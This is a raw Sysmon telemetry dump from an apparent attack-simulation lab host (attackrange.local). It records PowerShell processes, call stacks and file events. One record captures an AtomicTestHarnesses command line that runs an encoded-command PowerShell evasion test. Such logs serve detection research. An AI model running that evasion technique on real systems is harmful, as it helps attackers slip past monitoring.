22:55:48.302{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001697923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001697917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.309{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -Execute -ErrorAction Stop} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000001697916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-70F3-603D-7F88-00000000AD01}3100ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001697914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.302{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001697913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.273{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=3E64EEED3DD5DB4FFE7EA1C0E2A49380,SHA256=CE6A2012F34C0D512EE51157DEE705F02DDF07AB6DCBE350D104F4486F79F6D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.193{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.193{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.193{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.146{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.146{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001697907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:48.115{05ADC7E1-70F3-603D-7F88-00000000AD01}3100\PSHost.132591129479971283.3100.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.099{05ADC7E1-70F3-603D-7F88-00000000AD01}3100ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_getfzie0.hxq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.099{05ADC7E1-70F3-603D-7F88-00000000AD01}3100ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nipegbyk.4u3.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.099{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89BD560154E07C8C81BBCF5E6F3FD0F1,SHA256=FAB531302466979BC6798C4AB11571423D7879F6F7A55C8A611A8808ABC1B157,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nipegbyk.4u3.ps12021-03-01 22:55:48.074 10341000x80000000000000001697902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F4-603D-8088-00000000AD01}6892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51